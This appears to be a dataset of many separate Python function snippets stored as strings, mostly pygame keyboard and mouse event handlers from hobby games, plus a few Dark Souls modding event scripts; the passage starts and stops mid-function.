in pygame.event.get():\n #Quit if user exits window\n if event.type == pygame.QUIT:\n run = False\n\n #Get board list representation and player turn\n board_list = game.get_board()\n player_turn = game.get_player_turn()\n\n #Draw board and player pawns\n draw_board(WIN, board_list)\n draw_players(WIN, game.get_p1_location(), game.get_p2_location())\n if move_type == 'p':\n highlight_moves(WIN, game)\n if move_type == 'h':\n highlight_available_h_fences(WIN, game)\n if move_type == 'v':\n highlight_available_v_fences(WIN, game)\n \n #Get user move type \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_p:\n move_type = 'p'\n if event.key == pygame.K_h:\n move_type = 'h'\n if event.key == pygame.K_v:\n move_type = 'v'\n \n #Make move based on mouse input and move type\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'p':\n pos = pygame.mouse.get_pos()\n move_pawn(pos, game)\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'h':\n pos = pygame.mouse.get_pos()\n place_horizontal_fence(pos, game)\n if event.type == pygame.MOUSEBUTTONDOWN and move_type == 'v':\n pos = pygame.mouse.get_pos()\n place_vertical_fence(pos, game)\n \n #Reset move type after player makes a valid move\n if player_turn != game.get_player_turn():\n move_type = None\n \n #Display message if either user has won the game. \n if game.is_winner(1):\n player_one_won(WIN)\n if game.is_winner(2):\n player_two_won(WIN)\n\n #Reset game if backspace is pressed. \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_BACKSPACE:\n game = QuoridorGame()\n\n #Update display window\n pygame.display.update()\n\n pygame.quit()", "def handle_continuous_keys(self):\n shift = pygame.K_LSHIFT in self.held\n ctrl = pygame.K_LCTRL in self.held\n factor = 3 if shift else 1/3 if ctrl else 1\n for key in self.held:\n if not self.followmode:\n # if self.held_delay[key] == 0:\n if key in (pygame.K_w, pygame.K_UP): # up\n # self.canvas.move_offset(0, 5 * factor)\n self.canvas.move_focus(0, 5 * factor)\n elif key in (pygame.K_s, pygame.K_DOWN): # down\n # self.canvas.move_offset(0, -5 * factor)\n self.canvas.move_focus(0, -5 * factor)\n elif key in (pygame.K_d, pygame.K_RIGHT): # right\n # self.canvas.move_offset(-5 * factor, 0)\n self.canvas.move_focus(5 * factor, 0)\n elif key in (pygame.K_a, pygame.K_LEFT): # left\n # self.canvas.move_offset(5 * factor, 0)\n self.canvas.move_focus(-5 * factor, 0)\n if key in (pygame.K_e, pygame.K_KP_PLUS):\n self.canvas.zoom(2 * factor)\n elif key in (pygame.K_q, pygame.K_KP_MINUS):\n self.canvas.zoom(-2 * factor)\n for key in self.held:\n self.held_delay[key] = (self.held_delay[key] + 1) % 5", "def check_player_events(ai_settings, screen, player, projectiles):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n check_keyDown(event, ai_settings, screen, player, projectiles)\n elif event.type == pygame.KEYUP:\n check_keyUp(event, player)", "def find_choice_event(self, events):\n for event in events:\n if (event.type == pygame.KEYDOWN and event.key in (pygame.K_LEFT, pygame.K_RIGHT)) or \\\n (event.type == BUTTON_DOWN and event.pin == self.button_picture) or \\\n (event.type == BUTTON_DOWN and event.pin == self.button_print):\n return event", "def handle_events(self):\n keys = pygame.key.get_pressed()\n if self.game_manager.game_state == GameState.Running:\n if self.arcade:\n self.game_manager.control_players_arcade(self.joysticks) \n else:\n self.game_manager.control_players(keys)\n elif self.arcade:\n self.ui.arcade_control(self.joysticks[1])\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_manager.game_state = GameState.Quit \n if self.game_manager.game_state == GameState.Finished or\\\n self.game_manager.game_state == GameState.Menu :\n if event.type == pygame.KEYDOWN and not self.arcade:\n self.ui.control(event.key)\n #self.start_new_game(GameMode.EatToSurvive)", "def handle_event(self, event: Event) -> bool:\n\n if event.type == pygame.KEYUP:\n if event.key in [pygame.K_UP, pygame.K_RIGHT, pygame.K_DOWN, pygame.K_LEFT, pygame.K_SPACE]:\n self.our_board.rotate_ship_drawing()\n return True\n\n elif event.type == pygame.MOUSEMOTION:\n if self.our_board.handle_mouse_hover(event.pos[0], event.pos[1]) == HANDLED:\n return True\n\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.our_game_state == STATE_PREPARING \\\n and self.our_board.toggle_ship_click(event.pos[0], event.pos[1]) == HANDLED:\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n else:\n if self.our_game_state == STATE_PREPARING:\n self.start_game_button.check_click(event.pos[0], event.pos[1])\n return True\n else:\n self.their_board.make_move_click(event.pos[0], event.pos[1])\n return True\n\n elif event.type == pygame.USEREVENT:\n if event.action == ACTION_FIND_ME:\n if not event.team_id == self.our_team_id and self.their_team_id is None:\n self.their_team_id = event.team_id\n print(f\" Their team ID is [ {self.their_team_id} ].\")\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n\n elif event.action == ACTION_HIT and event.team_id == self.their_team_id:\n self.their_board.record_hit(event.row, event.col)\n if self.their_board.is_every_position_hit():\n self.change_game_state(STATE_OUR_WIN)\n return True\n else:\n self.change_game_state(STATE_THEIR_TURN)\n return True\n\n elif event.action == ACTION_MAKE_MOVE and self.our_game_state == STATE_OUR_TURN:\n self.their_board.record_firing(event.row, event.col)\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_MOVE}|{event.row}|{event.col}\")\n return True\n\n elif event.action == ACTION_MISS and event.team_id == self.their_team_id:\n self.their_board.record_miss(event.row, event.col)\n self.change_game_state(STATE_THEIR_TURN)\n return True\n\n elif event.action == ACTION_MOVE:\n if event.team_id == self.their_team_id and self.our_board.check_move(event.row, event.col) == HANDLED:\n if self.our_board.is_every_position_hit():\n self.change_game_state(STATE_THEIR_WIN)\n else:\n self.change_game_state(STATE_OUR_TURN)\n return True\n\n elif event.action == ACTION_READY_TO_START:\n self.their_game_state = STATE_READY_TO_START\n if self.our_game_state == STATE_PREPARING:\n self.start_game_button.set_enabled(self.can_be_ready_to_start())\n return True\n elif self.our_game_state == STATE_READY_TO_START:\n self.start_game()\n return True\n\n elif event.action == ACTION_STATUS:\n self.game_status.update_text(event.text)\n return True\n\n elif event.action == ACTION_WE_GOT_HIT:\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_HIT}|{event.row}|{event.col}\")\n return False\n\n elif event.action == ACTION_WE_WERE_MISSED:\n self.messages_to_send.put(f\"{self.our_team_id}|{ACTION_MISS}|{event.row}|{event.col}\")\n return False\n\n # If we got this far, then this event isn't of a type that we care about. So, we'll do\n # nothing. We'll also return False, meaning that the screen does not need to redraw.\n return False", "def event2510():\n header(2510)\n\n wait(0.2) # Wait for previous trigger effects to go away.\n\n if_event_flag_on(1, EVENT.SableRuneActive)\n\n if_player_has_special_effect(-1, SPEFFECT.RunicHit0)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit1)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit2)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit3)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit4)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit5)\n if_condition_true(2, -1)\n if_event_flag_on(3, EVENT.DarkAnorLondo)\n if_in_world_area(-2, 10, 1)\n if_in_world_area(-2, 10, 2)\n if_in_world_area(-2, 14, 0)\n if_in_world_area(-2, 15, 0)\n if_in_world_area(-2, 15, 1)\n if_in_world_area(-2, 17, 0)\n if_in_world_area(-2, 18, 1)\n if_condition_true(3, -2)\n if_condition_true(-3, 3)\n if_event_flag_on(4, EVENT.EarlyOolacile)\n if_in_world_area(4, 12, 1)\n if_condition_true(-3, 4)\n if_condition_true(2, -3)\n if_condition_true(-4, 2)\n\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive0)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive1)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive2)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive3)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive4)\n if_player_has_special_effect(-5, SPEFFECT.RunicPassive5)\n if_condition_true(5, -5)\n if_player_has_special_effect(5, SPEFFECT.SableRuneTempTrigger)\n if_condition_true(-4, 5)\n\n if_condition_true(1, -4)\n\n if_condition_true(0, 1)\n\n # Cancel any previous Sable buffs.\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune0)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune1)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune2)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune3)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune4)\n chr.cancel_special_effect(CHR.Player, SPEFFECT.SableRune5)\n\n # Apply appropriate level of Sable Rune effect, and register appropriate no-weapon condition.\n if_player_has_special_effect(5, SPEFFECT.RunicHit0)\n skip_if_condition_false(2, 5)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune0)\n restart()\n\n if_player_has_special_effect(6, SPEFFECT.RunicHit1)\n skip_if_condition_false(2, 6)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune1)\n restart()\n\n if_player_has_special_effect(7, SPEFFECT.RunicHit2)\n skip_if_condition_false(2, 7)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune2)\n restart()\n\n if_player_has_special_effect(-5, SPEFFECT.RunicHit3)\n skip_if_condition_false(2, -5)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune3)\n restart()\n\n if_player_has_special_effect(-6, SPEFFECT.RunicHit4)\n skip_if_condition_false(2, -6)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune4)\n restart()\n\n if_player_has_special_effect(-7, SPEFFECT.RunicHit5)\n skip_if_condition_false(1, -7)\n chr.set_special_effect(CHR.Player, SPEFFECT.SableRune5)\n\n restart()", "def check_keyup_events(event, rock):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\trock.moving_right = False\r\n\t\t\t\t\r\n\telif event.key == pygame.K_LEFT:\r\n\t\trock.moving_left = False\r\n\t\r\n\telif event.key == pygame.K_UP:\r\n\t\trock.moving_up = False\r\n\t\t\t\t\r\n\telif event.key == pygame.K_DOWN:\r\n\t\trock.moving_down = False", "def handle_input_event(self):\n\n self.markerPos = self.get_mouse_coordinate()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n raise QuitRequestedError\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n raise QuitRequestedError\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Event.is_valid_placement_stage(self.event):\n self.choice = self.get_mouse_coordinate()\n self.event = Event.next(self.event)\n self.timestep_watch.reset()\n\n liberties = self.env.liberty_after_next_steps(self.env.turn, self.env.getOpponent())\n self.env.printField(liberties)\n print()\n # self.env.printFlipNum(self.env.turn)\n # print(self.env.update_num_disks_can_filp(self.choice[0], self.choice[1], self.env.turn))\n\n # print(\"Click \", pos, \"coordinates: \", row, col)", "def check_events(rk_settings, screen, rock, bullets):\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\t\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tcheck_keydown_events(event, rk_settings, screen, rock, bullets)\r\n\t\t\t\t\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tcheck_keyup_events(event, rock)", "def check_events(ai_settings,screen,stats,play_button,ship,bullets,shot):\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tcheck_keydown_events(event,ai_settings,screen,ship,bullets,shot)\n\t\telif event.type == pygame.KEYUP:\n\t\t\tcheck_keyup_events(event, ship)\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_x, mouse_y = pygame.mouse.get_pos()\n\t\t\tcheck_play_button(ai_settings,screen,stats,play_button,ship,bullets,mouse_x,mouse_y)", "def check_events_prepare_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n for i in range(1,7):\n # Display edit/delete buttons\n if Rect(85 + 180* (i-1), 165, 130,110).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list_index = str(i)\n\n # Click on Edit\n elif Rect(85 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list = make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2)\n if 'CHARACTER_' + str(i) in line:\n user.character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n screen_status.build_deck_screen_display = True\n screen_status.prepare_screen_display = False\n\n # Click on Delete\n elif Rect(155 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n\n with open('user_deck_list_string.txt','a+') as f:\n\n f.seek(0)\n x = f.readlines()\n y = 1\n\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n else:\n break\n\n del x[y-1] # Delete DECK_LIST_\n del x[y-1] # Delete CHARACTER_\n\n with open('user_deck_list_string.txt','w') as f:\n f.writelines(x)\n\n user.deck_list_index = 'new'\n\n # Click on one of the opponent's deck\n for i in range(1,9):\n if i <= 4:\n if Rect(70 + 160* (i-1), 395, 130,180).collidepoint(pygame.mouse.get_pos()):\n player2.character_ai_index = str(i)\n else:\n if Rect(70 + 160* (i-5), 585, 130,180).collidepoint(pygame.mouse.get_pos()):\n player2.character_ai_index = str(i)\n\n # Click and pick a difficulty\n for i in range(1,5):\n if Rect(710, 445 + 80*(i-1),410,70).collidepoint(pygame.mouse.get_pos()):\n player2.ai_difficulty_index = str(i)\n\n\n\n # back\n if Rect(0,0,50,50).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = True\n screen_status.prepare_screen_display = False\n\n # play\n elif Rect(1150,0,50,50).collidepoint(pygame.mouse.get_pos()):\n prepare_screen_to_battle_screen_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n if button_status.prepare_screen_end_screen_warning_button_display == '':\n screen_status.battle_screen_display = True\n screen_status.prepare_screen_display = False\n\n # user.random_deck_list = random.sample(user.deck_list, len(user.deck_list))\n # user.remain_deck_list = user.random_deck_list[6:]\n # user.hand_list = user.random_deck_list[0:6]\n\n # click on ok on end screen warning sign\n elif Rect(1100, 62, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.prepare_screen_end_screen_warning_button_display = ''\n\n # Change name\n elif Rect(780, 10, 110, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.text_input_box_display = True\n\n # create new deck\n elif Rect(1020, 110, 120, 35).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n\n else:\n user.deck_list_index = 'new'\n user.deck_list = []\n user.character_card = ''\n screen_status.build_deck_screen_display = True\n screen_status.prepare_screen_display = False\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n\n # Opponent characters\n for i in range(1,5):\n if Rect(70 + 160* (i-1), 395, 130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'prepare_screen'\n button_status.card_zoom_part_indicator = 'opponent character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n for i in range(5,9):\n if Rect(70 + 160* (i-5), 585, 130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'prepare_screen'\n button_status.card_zoom_part_indicator = 'opponent character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n\n if x == 0:\n button_status.card_zoom_active = False", "def check_events(si_settings, screen, stats, sb, menu, play_button, high_scores, ship, aliens, bullets, alienBullets, images):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN:\r\n check_keydown_events(event, si_settings, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n check_play_button(si_settings, screen, stats, sb, play_button, ship, aliens, bullets, alienBullets, images, mouse_x, mouse_y)\r\n check_high_scores(si_settings, menu, high_scores, mouse_x, mouse_y)\r\n elif event.type == pygame.MOUSEMOTION:\r\n check_button_hover(pygame.mouse.get_pos(), play_button, high_scores)", "def check_click(self, mouse_x, mouse_y):\r\n # Change the x/y screen coordinates to grid coordinates\r\n column = mouse_x // 70\r\n row = mouse_y // 70\r\n\r\n if row in [0, 9] or column in [0, 9]:\r\n self.shoot_ray(row, column)\r\n elif 0 < row < 9 and 0 < column < 9:\r\n self.guess_atom(row, column)", "def play_game(self):\n\n while True:\n self.pixels = [clear] * 64\n\n # sense HAT controller\n for event in self.sense.stick.get_events():\n if event.action == \"pressed\":\n if event.direction == \"up\":\n self.set_direction(0)\n elif event.direction == \"right\":\n self.set_direction(1)\n elif event.direction == \"down\":\n self.set_direction(2)\n elif event.direction == \"left\":\n self.set_direction(3)\n # insert to the start of the array\n self.trail.insert(0, [self.trail[0][0] + self.direction[0], self.trail[0][1] + self.direction[1]])\n\n # one border cross in and the other off\n if self.trail[0][0] < 0:\n self.trail[0][0] = 7\n if self.trail[0][1] < 0:\n self.trail[0][1] = 7\n if self.trail[0][0] > 7:\n self.trail[0][0] = 0\n if self.trail[0][1] > 7:\n self.trail[0][1] = 0\n\n # we cover the situation, when the apple pos is a snake pos in this if statement\n if self.trail[0] == self.apple_pos:\n self.apple_pos = []\n while self.apple_pos == []:\n self.apple_pos = [random.randint(0, 7), random.randint(0, 7)]\n if self.apple_pos in self.trail:\n self.apple_pos = []\n self.length += 1\n # snake runs into itself\n elif self.trail[0] in self.trail[1:]:\n self.length = 1\n else:\n while len(self.trail) > self.length:\n # remove from the end ( \"like\" moving, but the length is correct)\n self.trail.pop()\n\n for pos in self.trail:\n # snake visualize on the pixel map (2d coord to 1d coord)\n self.pixels[pos[1] * 8 + pos[0]] = white\n\n # y * rowSize + x -> coordinate convert because of the pixel map\n self.pixels[self.apple_pos[1] * 8 + self.apple_pos[0]] = red\n # apple position (red led)\n self.sense.set_pixels(self.pixels)\n\n time.sleep(0.15)", "def check_events(self):\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.ai_game.quit()\r\n elif event.type == pg.KEYDOWN:\r\n self._check_keydown_events(event)\r\n elif event.type == pg.KEYUP:\r\n self._check_keyup_events(event)\r\n elif event.type == pg.MOUSEBUTTONDOWN:\r\n mouse_pos = pg.mouse.get_pos()\r\n self._check_button(mouse_pos)", "def catchGameEvents(self, is_player, fpsclock, screen):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.exit()\n return True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n return self.pauseMenu(fpsclock, screen)\n if is_player:\n self.playEvents(event)\n return False", "def event11510130():\n header(11510130, 1)\n\n skip_if_event_flag_off(3, EVENT.AnorLondoGwynWarp)\n chr.disable(CHR.DarkwraithInBossRoom)\n chr.disable(CHR.SilverKnightArcherNearBossFog)\n end()\n\n # Changes to make when Dark Anor Londo begins\n skip_if_event_flag_on(10 + 2 * len(Darkwraiths), EVENT.DarkAnorLondo)\n chr.disable(6640)\n chr.disable(6650)\n chr.disable(CHR.ChapelMimic)\n chr.disable(CHR.AbyssalPrinceJareel)\n for darkwraith in Darkwraiths:\n chr.disable(darkwraith)\n if_event_flag_on(0, EVENT.DarkAnorLondo)\n chr.enable(6640)\n chr.enable(6650)\n chr.enable(CHR.ChapelMimic)\n chr.enable(CHR.AbyssalPrinceJareel)\n chr.disable_ai(CHR.AbyssalPrinceJareel) # maybe redundant\n for darkwraith in Darkwraiths:\n chr.enable(darkwraith)\n\n # Skips to here if Dark Anor Londo has already started.\n # Disable chapel chest (replaced by Mimic).\n obj.disable(OBJ.ChapelChest)\n obj.disable_activation(OBJ.ChapelChest, -1)\n for enemy_id in DarkAnorLondoAllies:\n chr.set_team_type(enemy_id, TeamType.fighting_ally)\n # Move Palace archer.\n warp.short_warp(1510301, 'region', REGION.MoveArcherInDarkPalace, -1)\n for enemy_id in DarkAnorLondoDisabled:\n chr.disable(enemy_id)\n for painting_guardian_id in range(1510150, 1510159):\n # Disable Painting Guardians on the floor (except one getting killed).\n chr.disable(painting_guardian_id)\n skip_if_event_flag_on(1, 11510861) # Skip if Darkmoon Guardian is already dead.\n warp.warp(CHR.DarkmoonGuardian, 'region', 1512451, -1)\n end_if_event_flag_on(1034) # Stop here if Darkmoon Knightess is already dead.\n warp.warp(CHR.DarkmoonKnightess, 'region', 1512450, -1)\n chr.set_nest(CHR.DarkmoonKnightess, 1512450)\n chr.set_standby_animation_settings_to_default(CHR.DarkmoonKnightess)", "def check_keyup_events(event, hero):\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n hero.moving_right = False\n if event.key == pygame.K_LEFT or event.key == pygame.K_a:\n hero.moving_left = False\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n hero.moving_up = False\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n hero.moving_down = False", "def event_m20_11_x28(z104=20111500, z106=38, z107=12, z108=1, goods2=60536000):\n \"\"\"State 0,1: Dialog display\"\"\"\n # action:3000:\"⑱: Move\"\n DisplayYesNoMenu(3000, 1.8, z104, 190, 0, 0, 0)\n # action:1002:\"Use %s?\", goods:60536000:Pharros' Lockstone\n DisplayYesNoMenu(1002, 1.8, z104, 190, 2, goods2, 0)\n assert YesNoMenuDisplay() != 1\n \"\"\"State 2: Result judgment\"\"\"\n if (YesNoMenuResult() == 1) != 0:\n \"\"\"State 7: Bug key transition waiting: 30\"\"\"\n ChangeObjState(z104, 30)\n assert CompareObjStateId(z104, 30, 0)\n \"\"\"State 4: Action request to player\"\"\"\n ObjAnimationPlayerControlRequest(z104, z106, z107)\n assert PlayerIsInEventAction(z107) != 0\n \"\"\"State 5: OBJ status judgment\"\"\"\n IsPlayerPlayingMotion(0, z107, 0)\n # goods:60536000:Pharros' Lockstone\n DoesPlayerHaveItem(0, goods2, 0, 5, 1, 1, 0)\n CompareObjState(1, z104, 74, 0)\n CompareObjState(1, z104, 20, 0)\n if ConditionGroup(0):\n pass\n elif ConditionGroup(1):\n \"\"\"State 6: Insect key consumption\"\"\"\n # goods:60536000:Pharros' Lockstone\n ConsumeItem(goods2, z108)\n assert CompareObjStateId(z104, 20, 0)\n \"\"\"State 9: End state\"\"\"\n return 0\n else:\n pass\n \"\"\"State 8: Bug key: Initial state: 10\"\"\"\n ChangeObjState(z104, 10)\n \"\"\"State 3: Rerun\"\"\"\n RestartMachine()", "def detectMouse(self):\n self.runMouse()\n time.sleep(0.1)\n searching = True\n while searching:\n for dev in self.mouses:\n if self.hitsMouses[dev]:\n return(dev)\n #time.sleep(0.0001)", "def manual_input(self):\r\n atom_list = []\r\n while len(atom_list) < 4:\r\n for event in pygame.event.get():\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n column = mouse_x // 70\r\n row = mouse_y // 70\r\n if 0 < column < 9 and 0 < row < 9:\r\n if (row, column) not in atom_list:\r\n atom_list.append((row, column))\r\n return atom_list", "def skip_if_key_pressed(self):\n register = (self.opcode & 0xF00) >> 8\n key = self.registers[register]\n keys = pygame.key.get_pressed()\n if keys[ord(config.keys[key])]:\n self.pc += 2\n logger.info(\"Skipped {} because {} was pressed\".format(\n self.memory[self.pc + 2],\n key))", "def _check_keyup_events(self, event):\r\n if event.key == pg.K_RIGHT:\r\n self.ship.moving_right = False\r\n elif event.key == pg.K_LEFT:\r\n self.ship.moving_left = False", "def evaluate(self,joystick,keys):\n \n self.AG_twinklers.do() \n \n \n if joystick.isUp(keys)==True and self.solomon.current_state[\"jumping\"]==0: \n self.solomon.current_state[\"jumping\"]=1 \n\n\n walkcheck=False\n \n if self.solomon.A_wandswish.overide==False:\n \n self.solomon.current_state[\"wandswish\"]=0 \n\n if joystick.isDown(keys)==True: \n self.solomon.current_state[\"crouching\"]=1 \n self.solomon.current_state[\"standing\"]=0\n else: \n self.solomon.current_state[\"crouching\"]=0 \n \n if joystick.isRight(keys)==True:\n self.solomon.facing=1 \n self.solomon.current_state[\"walking\"]=1\n self.solomon.current_state[\"standing\"]=1\n walkcheck=True\n elif joystick.isLeft(keys)==True: \n self.solomon.facing=-1 \n walkcheck=True\n self.solomon.current_state[\"walking\"]=1\n self.solomon.current_state[\"standing\"]=0\n else:\n self.solomon.current_state[\"walking\"]=0 \n self.solomon.current_state[\"standing\"]=1\n\n canwalk=False\n if walkcheck:\n result=self.detect(self.solomon.x+self.solomon.facing*self.solomon.step*5.0,self.solomon.y) \n if (len(result)==0 or result[0][0]==\".\") and self.solomon.current_state[\"walking\"]==1:\n #self.solomon.x+=self.solomon.step*self.solomon.facing \n self.solomon.current_state[\"standing\"]=0 \n self.solomon.current_state[\"walking\"]=1\n canwalk=True\n #elif result[0][0] in [\"]\n\n result1=self.grid[int(self.solomon.y-0)][int(self.solomon.x+0.5+self.solomon.step*2*self.solomon.facing)]\n result2=self.grid[int(self.solomon.y-0)][int(self.solomon.x+0.5-self.solomon.step*2*self.solomon.facing)]\n #print \"fall check\" + str((result1,result2,self.solomon.x,self.solomon.y))\n if result1==\".\" and result2==\".\":\n self.solomon.y-=self.solomon.step\n self.solomon.current_state[\"walking\"]=0\n canwalk=False\n\n if canwalk==True: self.solomon.x+=self.solomon.step*self.solomon.facing\n\n if joystick.isFire(keys)==True and self.solomon.current_state[\"wandswish\"]==0: \n self.solomon.A_wandswish.kick()\n self.solomon.A_wandswish.overide=True\n self.solomon.current_state[\"wandswish\"]=1 \n\n \n if self.solomon.current_state[\"jumping\"]==1:\n self.solomon.AG_jump.do()\n print \"he's jumping\"\n print str(self.solomon.AG_jump.action(\"jump_displacement\").tick)\n self.solomon.y+=0.2\n #print \"co-ordinates \"+str((self.solomon.x,self.solomon.y))", "def handle_key_events():\n playing = True\n for event in pygame.event.get():\n # Allow the user to quit\n if event.type==QUIT:\n playing = False\n if event.type==KEYDOWN and event.key == K_ESCAPE:\n playing = False\n\n # If the user clicks on a picture, do some breeding\n if event.type==MOUSEBUTTONUP:\n mouse_pos = pygame.mouse.get_pos()\n picture_index = point_to_picture(mouse_pos)\n\n global pictures\n if (picture_index >= 0 and picture_index < len(pictures)):\n picture = pictures[picture_index]\n pictures = create_new_generation(picture, picture_index)\n\n return playing", "def play(self, event):\n if self.num_clicks == 1:\n self.clickable(event)\n if len(self.canvas.find_withtag(\"selected\")) == 2:\n self.num_of_tries += 1\n print(f'Number of tries {self.num_of_tries}')\n if self.num_of_tries > 13:\n self.score -= 10\n self.score_label.config(text=f'Score: {self.score}')\n self.check_match(self.click_tiles)\n self.canvas.after(self.delay, self.flip_back)\n self.click_tiles.clear()\n self.num_clicks = 0\n else:\n self.clickable(event)", "def handle_keys(self):\n handled = 0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n end_game()\n elif event.type == pygame.KEYDOWN:\n if handled and event.key in (pygame.K_DOWN, pygame.K_UP, pygame.K_LEFT, pygame.K_RIGHT):\n pygame.event.post(event)\n break\n if event.key == pygame.K_UP:\n self.snake.turn(self.snake.up)\n handled = True\n elif event.key == pygame.K_DOWN:\n self.snake.turn(self.snake.down)\n handled = True\n elif event.key == pygame.K_LEFT:\n self.snake.turn(self.snake.left)\n handled = True\n elif event.key == pygame.K_RIGHT:\n self.snake.turn(self.snake.right)\n handled = True", "def _check_keyup_events(self, event):\t\n\t\tif event.key == pygame.K_RIGHT:\n\t\t\tself.pigeon.moving_right = False\n\t\telif event.key == pygame.K_LEFT:\n\t\t\tself.pigeon.moving_left = False", "def check_replay_button(self, mouse_x, mouse_y):\r\n for button in self._replay_button_list:\r\n if button.get_button_rect().collidepoint(mouse_x, mouse_y):\r\n button_clicked = button\r\n break\r\n else:\r\n button_clicked = None\r\n\r\n if button_clicked is not None and button_clicked.get_num_atom() == 1:\r\n self.setup_new_game()\r\n elif button_clicked is not None and button_clicked.get_num_atom() == 2:\r\n sys.exit()", "def main(win):\n\tbird = Bird()\n\tpipes = []\n\n\tclock = pygame.time.Clock()\n\tlost = False\n\n\trun = True\n\twhile run:\n\t\tclock.tick(30)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\t\t\t\tbreak\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tbird.jump()\n\t\t\t\t\tprint(\"jump\")\n\n\t\tbird.move()\n\n\t\tfor pipe in pipes:\n\t\t\tif pipe.collide(bird.x, bird.y):\n\t\t\t\tprint(\"bird hit pipe\")\n\t\t\t\tlost = True\t\n\n\t\tif lost:\n\t\t\tbreak\n\n\tbird.die()\n\tend_screen()", "def MouseClick(event):\r\n global player\r\n global winner\r\n Window.focus_set()\r\n x = event.x // 100 # convertit une 